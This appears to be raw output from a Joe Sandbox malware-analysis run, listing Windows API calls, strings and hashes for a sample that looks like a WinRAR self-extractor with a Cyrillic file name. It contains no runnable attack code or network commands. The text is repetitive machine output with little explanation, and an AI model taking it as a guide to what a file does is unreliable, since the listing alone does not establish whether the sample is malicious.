• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3668304517-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF606386288: FindClose.KERNELBASE(?,?,?,00007FF60638FFA5), ref: 00007FF6063862BD
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF606395023
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1011579015-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: GetDlgItem.USER32 ref: 00007FF6063A2C33
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: ShowWindow.USER32 ref: 00007FF6063A2C59
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2C6E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2C86
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2CA7
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2CC3
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2D06
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2D24
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2D38
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2D62
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2D7A
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6063A3807
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MessageSend$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60638647C: FindFirstFileW.KERNELBASE ref: 00007FF6063864CB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60638647C: FindFirstFileW.KERNELBASE ref: 00007FF60638651E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60638647C: GetLastError.KERNEL32 ref: 00007FF60638656F
                                                                                                                                                                                                                                                        • FindClose.KERNELBASE(?,?,?,00007FF60638FFA5), ref: 00007FF6063862BD
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ItemMessageSend
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                                                                                                                                                                                                        • String ID: %ls$%s: %s
                                                                                                                                                                                                                                                        • API String ID: 2539828978-2259941744
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                        • API String ID: 1759834784-2761157908
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1693479884-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                                                        • Opcode ID: 5f39327fa42525bc33200ed161c8229643c86edd9f1335a814b99d0019b01ea8
                                                                                                                                                                                                                                                        • Instruction ID: e833c88a59e9e2d895e4ad266990f03a677baed5d67a58cb52db2ee3aa4987b2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f39327fa42525bc33200ed161c8229643c86edd9f1335a814b99d0019b01ea8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D315C72608B818AEB648F60E8503ED7364FB85748F54503ADB8E87B99DF3DD648C750
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                                        • Opcode ID: 2759f8db754f876dc0f97b654b135c0d6c98d8b2746f43aa6ee3cc8681b6d2d7
                                                                                                                                                                                                                                                        • Instruction ID: 8a8b1e28f768546c5ed8e54fb30ba4b9181de1733354cc2e06be233c9eb2b8c6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2759f8db754f876dc0f97b654b135c0d6c98d8b2746f43aa6ee3cc8681b6d2d7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C319136608F8186DB64CF25E8402AE73A0FB88758F601135EA8D87B69DF3DC545CB40
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6063B2F54
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063AAEC4: GetCurrentProcess.KERNEL32(00007FF6063B415D), ref: 00007FF6063AAEF1
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: *?$.
                                                                                                                                                                                                                                                        • API String ID: 2518042432-3972193922
                                                                                                                                                                                                                                                        • Opcode ID: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
                                                                                                                                                                                                                                                        • Instruction ID: e8f52669226c3ed133df4434cead80ed517470948cea3e0182c56ce0eb5f774c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5051D162B14EA581FB18DFA298004B967A4FF44BD8B646531DF1E97B85DF3ED0428340
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: memcpy_s
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1502251526-0
                                                                                                                                                                                                                                                        • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                                                                                                                                                                                        • Instruction ID: b69f1b8b166088117f6fd2475cc662657bd0f3f63eb3516e32801b67c70b66d6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2D1E472B1868687DB38CF15E18466AB7A1FB88794F24A134CB4E97B44DF3DE801CB40
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF60638FD53), ref: 00007FF606383C05
                                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(?,?,?,?,?,?,00000000,00007FF60638FD53), ref: 00007FF606383C39
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,00007FF60638FD53), ref: 00007FF606383C63
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1365068426-0
                                                                                                                                                                                                                                                        • Opcode ID: 684dc38ac55c5e82846154b96ca5d63968fe70dc8924e915fe5da19121ede087
                                                                                                                                                                                                                                                        • Instruction ID: 157e2be075c0ef9d92fe5366f5c18067d64ec3945ca468ac63de0ae7b5fbd720
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 684dc38ac55c5e82846154b96ca5d63968fe70dc8924e915fe5da19121ede087
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4016271B0CB4686E7188F66B88017AA3A1FB89BC0F586038EA4EC7B55DF7DD5058780
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 15204871-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1061551593-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FormatInfoLocaleNumber
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2169056816-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Version
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                        • API String ID: 3215553584-4108050209
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: 0
• API String ID: 3215553584-4108050209
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
Memory Dump Source
• Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
Similarity
• API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
• String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
• API String ID: 2565136772-3242537097
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
• String ID: GETPASSWORD1$Software\WinRAR SFX
• API String ID: 431506467-1315819833
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
• String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
• API String ID: 2868844859-1533471033
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                                                                                                                                                                                        • String ID: STATIC
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                        • String ID: UNC$\\?\
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ItemTextWindow
                                                                                                                                                                                                                                                        • String ID: LICENSEDLG
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                                                                                                                                                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID: $
                                                                                                                                                                                                                                                        • API String ID: 3668304517-227171996
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                        • API String ID: 2940173790-393685449
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF606390AA0: CompareStringW.KERNEL32(?,?,00007FF606386C19), ref: 00007FF606390ABF
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063812BC: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6063813B6
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF606390AD0: CompareStringW.KERNEL32 ref: 00007FF606390B36
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF606391DC2
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF606391DC8
                                                                                                                                                                                                                                                        • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF606391E25
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CompareString_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskswprintf
                                                                                                                                                                                                                                                        • String ID: .zipx$.zx$z%s%02d
                                                                                                                                                                                                                                                        • API String ID: 2859674139-515631857
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6063AAA83,?,?,?,00007FF6063A87EE,?,?,?,00007FF6063A87A9), ref: 00007FF6063AA901
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00007FF6063AAA83,?,?,?,00007FF6063A87EE,?,?,?,00007FF6063A87A9), ref: 00007FF6063AA90F
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6063AAA83,?,?,?,00007FF6063A87EE,?,?,?,00007FF6063A87A9), ref: 00007FF6063AA939
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF6063AAA83,?,?,?,00007FF6063A87EE,?,?,?,00007FF6063A87A9), ref: 00007FF6063AA97F
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,00000000,00007FF6063AAA83,?,?,?,00007FF6063A87EE,?,?,?,00007FF6063A87A9), ref: 00007FF6063AA98B
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(?,?,?,00007FF6063A5003,?,?,?,00007FF6063A53BA), ref: 00007FF6063A50BB
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6063A5003,?,?,?,00007FF6063A53BA), ref: 00007FF6063A50D8
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6063A5003,?,?,?,00007FF6063A53BA), ref: 00007FF6063A50F4
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                                                                        • API String ID: 667068680-1718035505
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                                        • API String ID: 2889003569-2084237596
                                                                                                                                                                                                                                                        • Opcode ID: 72139495dcf16bb81820f3d810a7b9a0b09b4fcdb0284e32ba8cd3a939180766
                                                                                                                                                                                                                                                        • Instruction ID: d0c6c25476781e912d6458b510ab19eb638204d7ee8739786cb970c81f8b9e8b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72139495dcf16bb81820f3d810a7b9a0b09b4fcdb0284e32ba8cd3a939180766
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B91E173A187818AEB14CB65E8803AD7BB0FB44788F20513AEE8D97B95DF39D191C740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm$f
                                                                                                                                                                                                                                                        • API String ID: 2395640692-629598281
                                                                                                                                                                                                                                                        • Opcode ID: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
                                                                                                                                                                                                                                                        • Instruction ID: 1264f19b7afffd13fa85c2ccf80a1b5231bcdd7a768c013f73482666869113fd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B851B332E0960286EF58DF15E444A793795FB44B98F21A530DE1F87788EF3AE841DB80
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
